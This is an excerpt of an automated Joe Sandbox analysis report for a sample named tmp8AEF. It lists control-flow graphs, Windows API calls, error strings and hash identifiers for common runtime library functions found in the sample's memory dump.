                                                                                        • API String ID: 3013587201-537541572
                                                                                        • Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                        • Instruction ID: e539b5b569d69f6f53b1971c1198f23ad4841fdee460c71122e855426a66c7ab
                                                                                        • Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                        • Instruction Fuzzy Hash: AB41F571B19A22A1FA16AF17F820675B2A1BF4CBB2F985175DD0D47784EE3CE8458320
                                                                                        Function 00007FF7CA7AAD6C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 732 7ff7ca7aad6c-7ff7ca7aad92 733 7ff7ca7aad94-7ff7ca7aada8 call 7ff7ca7a43d4 call 7ff7ca7a43f4 732->733 734 7ff7ca7aadad-7ff7ca7aadb1 732->734 748 7ff7ca7ab19e 733->748 735 7ff7ca7ab187-7ff7ca7ab193 call 7ff7ca7a43d4 call 7ff7ca7a43f4 734->735 736 7ff7ca7aadb7-7ff7ca7aadbe 734->736 755 7ff7ca7ab199 call 7ff7ca7a9bf0 735->755 736->735 738 7ff7ca7aadc4-7ff7ca7aadf2 736->738 738->735 742 7ff7ca7aadf8-7ff7ca7aadff 738->742 745 7ff7ca7aae01-7ff7ca7aae13 call 7ff7ca7a43d4 call 7ff7ca7a43f4 742->745 746 7ff7ca7aae18-7ff7ca7aae1b 742->746 745->755 751 7ff7ca7aae21-7ff7ca7aae27 746->751 752 7ff7ca7ab183-7ff7ca7ab185 746->752 753 7ff7ca7ab1a1-7ff7ca7ab1b8 748->753 751->752 756 7ff7ca7aae2d-7ff7ca7aae30 751->756 752->753 755->748 756->745 759 7ff7ca7aae32-7ff7ca7aae57 756->759 761 7ff7ca7aae59-7ff7ca7aae5b 759->761 762 7ff7ca7aae8a-7ff7ca7aae91 759->762 763 7ff7ca7aae82-7ff7ca7aae88 761->763 764 7ff7ca7aae5d-7ff7ca7aae64 761->764 765 7ff7ca7aae66-7ff7ca7aae7d call 7ff7ca7a43d4 call 7ff7ca7a43f4 call 7ff7ca7a9bf0 762->765 766 7ff7ca7aae93-7ff7ca7aaebb call 7ff7ca7ac90c call 7ff7ca7a9c58 * 2 762->766 768 7ff7ca7aaf08-7ff7ca7aaf1f 763->768 764->763 764->765 796 7ff7ca7ab010 765->796 792 7ff7ca7aaed8-7ff7ca7aaf03 call 7ff7ca7ab594 766->792 793 7ff7ca7aaebd-7ff7ca7aaed3 call 7ff7ca7a43f4 call 7ff7ca7a43d4 766->793 771 7ff7ca7aaf21-7ff7ca7aaf29 768->771 772 7ff7ca7aaf9a-7ff7ca7aafa4 call 7ff7ca7b2c2c 768->772 771->772 776 7ff7ca7aaf2b-7ff7ca7aaf2d 771->776 783 7ff7ca7aafaa-7ff7ca7aafbf 772->783 784 7ff7ca7ab02e 772->784 776->772 780 7ff7ca7aaf2f-7ff7ca7aaf45 776->780 780->772 785 7ff7ca7aaf47-7ff7ca7aaf53 780->785 783->784 790 7ff7ca7aafc1-7ff7ca7aafd3 GetConsoleMode 783->790 788 7ff7ca7ab033-7ff7ca7ab053 ReadFile 784->788 785->772 791 7ff7ca7aaf55-7ff7ca7aaf57 785->791 794 7ff7ca7ab059-7ff7ca7ab061 788->794 795 7ff7ca7ab14d-7ff7ca7ab156 GetLastError 788->795 790->784 797 7ff7ca7aafd5-7ff7ca7aafdd 790->797 791->772 798 7ff7ca7aaf59-7ff7ca7aaf71 791->798 792->768 793->796 794->795 801 7ff7ca7ab067 794->801 804 7ff7ca7ab173-7ff7ca7ab176 795->804 805 7ff7ca7ab158-7ff7ca7ab16e call 7ff7ca7a43f4 call 7ff7ca7a43d4 795->805 806 7ff7ca7ab013-7ff7ca7ab01d call 7ff7ca7a9c58 796->806 797->788 803 7ff7ca7aafdf-7ff7ca7ab001 ReadConsoleW 797->803 798->772 799 7ff7ca7aaf73-7ff7ca7aaf7f 798->799 799->772 807 7ff7ca7aaf81-7ff7ca7aaf83 799->807 811 7ff7ca7ab06e-7ff7ca7ab083 801->811 813 7ff7ca7ab022-7ff7ca7ab02c 803->813 814 7ff7ca7ab003 GetLastError 803->814 808 7ff7ca7ab009-7ff7ca7ab00b call 7ff7ca7a4368 804->808 809 7ff7ca7ab17c-7ff7ca7ab17e 804->809 805->796 806->753 807->772 818 7ff7ca7aaf85-7ff7ca7aaf95 807->818 808->796 809->806 811->806 820 7ff7ca7ab085-7ff7ca7ab090 811->820 813->811 814->808 818->772 824 7ff7ca7ab092-7ff7ca7ab0ab call 7ff7ca7aa984 820->824 825 7ff7ca7ab0b7-7ff7ca7ab0bf 820->825 832 7ff7ca7ab0b0-7ff7ca7ab0b2 824->832 829 7ff7ca7ab0c1-7ff7ca7ab0d3 825->829 830 7ff7ca7ab13b-7ff7ca7ab148 call 7ff7ca7aa7c4 825->830 833 7ff7ca7ab0d5 829->833 834 7ff7ca7ab12e-7ff7ca7ab136 829->834 830->832 832->806 836 7ff7ca7ab0da-7ff7ca7ab0e1 833->836 834->806 837 7ff7ca7ab0e3-7ff7ca7ab0e7 836->837 838 7ff7ca7ab11d-7ff7ca7ab128 836->838 839 7ff7ca7ab103 837->839 840 7ff7ca7ab0e9-7ff7ca7ab0f0 837->840 838->834 842 7ff7ca7ab109-7ff7ca7ab119 839->842 840->839 841 7ff7ca7ab0f2-7ff7ca7ab0f6 840->841 841->839 843 7ff7ca7ab0f8-7ff7ca7ab101 841->843 842->836 844 7ff7ca7ab11b 842->844 843->842 844->834
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID:
                                                                                        • API String ID: 3215553584-0
                                                                                        • Opcode ID: 61b7c791dd7b4870e419cd94b23561cebff66563b6152af2ba6a1b175460b8f9
                                                                                        • Instruction ID: 526e1b91499e656a934263aa98156c479dc3e8e63386a269effbe7ea5a762aa9
                                                                                        • Opcode Fuzzy Hash: 61b7c791dd7b4870e419cd94b23561cebff66563b6152af2ba6a1b175460b8f9
                                                                                        • Instruction Fuzzy Hash: 15C10822A0C68771FB10AF16B0202BEB754FBD8BA2F956171E94D07791DE7DEC558320
                                                                                        Function 00007FF7CA7933E0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(?,00007FF7CA793534), ref: 00007FF7CA793411
                                                                                          • Part of subcall function 00007FF7CA7929E0: GetLastError.KERNEL32(?,?,?,00007FF7CA79342E,?,00007FF7CA793534), ref: 00007FF7CA792A14
                                                                                          • Part of subcall function 00007FF7CA7929E0: FormatMessageW.KERNEL32(?,?,?,00007FF7CA79342E), ref: 00007FF7CA792A7D
                                                                                          • Part of subcall function 00007FF7CA7929E0: MessageBoxW.USER32 ref: 00007FF7CA792ACF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$ErrorFileFormatLastModuleName
                                                                                        • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                        • API String ID: 517058245-2863816727
                                                                                        • Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                        • Instruction ID: 461ee177c69afbedae8b52f28cbfc0310a9f30a65b6c8f04beec5da2ebdb988f
                                                                                        • Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                        • Instruction Fuzzy Hash: 3721E260B1864291FA21BF32F8707B99250BF5C3B6FC041B7DA5D86AE5EE2CE5048360
                                                                                        Function 00007FF7CA7AEC9C Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1022 7ff7ca7aec9c-7ff7ca7aecd8 1023 7ff7ca7aee8e-7ff7ca7aee99 call 7ff7ca7a43f4 1022->1023 1024 7ff7ca7aecde-7ff7ca7aece7 1022->1024 1029 7ff7ca7aee9d-7ff7ca7aeeb9 call 7ff7ca79b870 1023->1029 1024->1023 1026 7ff7ca7aeced-7ff7ca7aecf6 1024->1026 1026->1023 1028 7ff7ca7aecfc-7ff7ca7aecff 1026->1028 1028->1023 1030 7ff7ca7aed05-7ff7ca7aed16 1028->1030 1032 7ff7ca7aed40-7ff7ca7aed44 1030->1032 1033 7ff7ca7aed18-7ff7ca7aed21 call 7ff7ca7aec40 1030->1033 1032->1023 1035 7ff7ca7aed4a-7ff7ca7aed4e 1032->1035 1033->1023 1039 7ff7ca7aed27-7ff7ca7aed2a 1033->1039 1035->1023 1038 7ff7ca7aed54-7ff7ca7aed58 1035->1038 1038->1023 1040 7ff7ca7aed5e-7ff7ca7aed6e call 7ff7ca7aec40 1038->1040 1039->1023 1041 7ff7ca7aed30-7ff7ca7aed33 1039->1041 1045 7ff7ca7aed70-7ff7ca7aed73 1040->1045 1046 7ff7ca7aed77 call 7ff7ca7b54a4 1040->1046 1041->1023 1043 7ff7ca7aed39 1041->1043 1043->1032 1045->1046 1047 7ff7ca7aed75 1045->1047 1049 7ff7ca7aed7c-7ff7ca7aed93 call 7ff7ca7b48a8 1046->1049 1047->1046 1052 7ff7ca7aed99-7ff7ca7aeda4 call 7ff7ca7b48d8 1049->1052 1053 7ff7ca7aeeba-7ff7ca7aeecf call 7ff7ca7a9c10 1049->1053 1052->1053 1058 7ff7ca7aedaa-7ff7ca7aedb5 call 7ff7ca7b4908 1052->1058 1058->1053 1061 7ff7ca7aedbb-7ff7ca7aee4f 1058->1061 1062 7ff7ca7aee51-7ff7ca7aee6d 1061->1062 1063 7ff7ca7aee89-7ff7ca7aee8c 1061->1063 1064 7ff7ca7aee6f-7ff7ca7aee73 1062->1064 1065 7ff7ca7aee84-7ff7ca7aee87 1062->1065 1063->1029 1064->1065 1066 7ff7ca7aee75-7ff7ca7aee80 call 7ff7ca7b54e8 1064->1066 1065->1029 1066->1065
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: _get_daylight$_isindst
                                                                                        • String ID:
                                                                                        • API String ID: 4170891091-0
                                                                                        • Opcode ID: 8f9731ccc05e5e98dab1658fcebd939f282d40e9b6d5561daf5942648b351509
                                                                                        • Instruction ID: ba39bdbebd225eb41e4cc9cfa59b25c72f0ec73cf9738557681df28926829f2d
                                                                                        • Opcode Fuzzy Hash: 8f9731ccc05e5e98dab1658fcebd939f282d40e9b6d5561daf5942648b351509
                                                                                        • Instruction Fuzzy Hash: F4515A72F082219AFB14EF65A8656BCB7B1BB1837BF901175DD1D42AE4DF38A801C710
                                                                                        Function 00007FF8B8316110 Relevance: 6.1, APIs: 4, Instructions: 129COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2285875889.00007FF8B8301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8B8300000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2285844343.00007FF8B8300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2286113655.00007FF8B83B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2286190303.00007FF8B83EF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2286212541.00007FF8B83F2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff8b8300000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$__security_init_cookie
                                                                                        • String ID:
                                                                                        • API String ID: 2222513578-0
                                                                                        • Opcode ID: 51a1c68c6362424b61c1acff22cfa8e2821de0ade73df4afb968f174aaff75c0
                                                                                        • Instruction ID: c2ca61d711092ae3e39f99b9fd34e8f8a558f289c1622a4ab68342770e3c2706
                                                                                        • Opcode Fuzzy Hash: 51a1c68c6362424b61c1acff22cfa8e2821de0ade73df4afb968f174aaff75c0
                                                                                        • Instruction Fuzzy Hash: 12515D20E0C64342FA9977EDD95517A51919F4DBE0F1C4638DB2E06AD7EF2DB8838708
                                                                                        Function 00007FF7CA7A4A8C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                        • String ID:
                                                                                        • API String ID: 2780335769-0
                                                                                        • Opcode ID: 44011dbc5c196255e5d063134f532b0674048b95aab6dcf0e225215e54208c6d
                                                                                        • Instruction ID: f2bc9441cd62ff9c61be3ef5be9b2931b70133ac04ead9a66900763bdfeeb424
                                                                                        • Opcode Fuzzy Hash: 44011dbc5c196255e5d063134f532b0674048b95aab6dcf0e225215e54208c6d
                                                                                        • Instruction Fuzzy Hash: 6251A023A086419AFB14EF72E4603BDA3A1FB4CB69F609075DE0D47688DF39D8518760
                                                                                        Function 00007FF7CA7A4938 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                        • String ID:
                                                                                        • API String ID: 1279662727-0
                                                                                        • Opcode ID: c9c3dc0ca6ff3025a18f37416ed5252826b5e2a6b8668c561ba6737191909872
                                                                                        • Instruction ID: 4273bd0ac43a22d368c38be3f924296c482fcc2729f9105fbe6be4fc4d1f0360
                                                                                        • Opcode Fuzzy Hash: c9c3dc0ca6ff3025a18f37416ed5252826b5e2a6b8668c561ba6737191909872
                                                                                        • Instruction Fuzzy Hash: 7E41A522D1878193F710AF62A520379B260FBA8775F50A374DA5C03AD5DF7DA9F08714
                                                                                        Function 00007FF7CA79BF5C Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                        • String ID:
                                                                                        • API String ID: 3251591375-0
                                                                                        • Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                        • Instruction ID: 49b5354147e262e17c0615aeac76db803852de5a14d1621bfbd34021169d506b
                                                                                        • Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                        • Instruction Fuzzy Hash: BE313F11A4C24249FE54BF7BB435BB99291BF4D3A6FC414B6E90E472D3DE2DA8058231
                                                                                        Function 00007FF7CA7A8D48 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                        • String ID:
                                                                                        • API String ID: 1703294689-0
                                                                                        • Opcode ID: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                        • Instruction ID: b77186e68ffb366b50de70177d1347910301ef35d12d7028ab6fa50a907817e1
                                                                                        • Opcode Fuzzy Hash: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                        • Instruction Fuzzy Hash: E2D06750F1870A9AFA543F7278A957992557FAC722B9024B8DC4A0A393CD2CA80E4660
                                                                                        Function 00007FF8B8316FD0 Relevance: 3.8, APIs: 3, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2285875889.00007FF8B8301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8B8300000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2285844343.00007FF8B8300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2286113655.00007FF8B83B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2286190303.00007FF8B83EF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2286212541.00007FF8B83F2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff8b8300000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 1452528299-0
                                                                                        • Opcode ID: 6b4fdf962c8d231f1478f013950a70e71442974e5fb203732b388d25e7008839
                                                                                        • Instruction ID: dccc5a93fb1edc8eaea0c3a3a5aa49b2732faf5f99b8b8419e6084982f1ec758
                                                                                        • Opcode Fuzzy Hash: 6b4fdf962c8d231f1478f013950a70e71442974e5fb203732b388d25e7008839
                                                                                        • Instruction Fuzzy Hash: 3A215020F0D64382FA59B77D99511BA51515F4CFE0F1C0634E72E066EAEF2EB8435318
                                                                                        Function 00007FF7CA79F45C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID:
                                                                                        • API String ID: 3215553584-0
                                                                                        • Opcode ID: 8760811a46c694da2ce7fcb713cb8132a6e7826c56b7b9f56bdeeaa18c726bba
                                                                                        • Instruction ID: a4dfc8829e693f07a7c0064f1de45b46ac2f21e51590c91da7984f03d357ae46
                                                                                        • Opcode Fuzzy Hash: 8760811a46c694da2ce7fcb713cb8132a6e7826c56b7b9f56bdeeaa18c726bba
                                                                                        • Instruction Fuzzy Hash: 5751E562B0924246FA24BF37B420A7EA291BF4CBB6F948676DD6C477D5CF3CD4008620
                                                                                        Function 00007FF7CA7AB444 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastPointer
                                                                                        • String ID:
                                                                                        • API String ID: 2976181284-0
                                                                                        • Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                        • Instruction ID: aa0f102f93082b806c7fb1aba727ece70a49d67cc56de007afebda20d1280aae
                                                                                        • Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                        • Instruction Fuzzy Hash: 14110162A08B8181EA10AF26B850179B361FB88BF5F945371EE7D0B7E9CF3CD8508700
                                                                                        Function 00007FF7CA7A4C34 Relevance: 3.0, APIs: 2, Instructions: 40timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CA7A4B49), ref: 00007FF7CA7A4C67
                                                                                        • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CA7A4B49), ref: 00007FF7CA7A4C7D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: Time$System$FileLocalSpecific
                                                                                        • String ID:
                                                                                        • API String ID: 1707611234-0
                                                                                        • Opcode ID: 5814b874014510fcf00941fef2b2171ed045486f006683dc2ae422325307d6da
                                                                                        • Instruction ID: 06bd9fb3de4e1be26035bab8c7ab6140a8575f6e91a5777a26518b3a00bac9b8
                                                                                        • Opcode Fuzzy Hash: 5814b874014510fcf00941fef2b2171ed045486f006683dc2ae422325307d6da
                                                                                        • Instruction Fuzzy Hash: B911C43260C60291FB246F12B42013EF3A0FB89776F901235FAAD419D4EF2DD460CB10
                                                                                        Function 00007FF7CA7A9E68 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CloseHandle.KERNELBASE(?,?,?,00007FF7CA7A9CE5,?,?,00000000,00007FF7CA7A9D9A), ref: 00007FF7CA7A9ED6
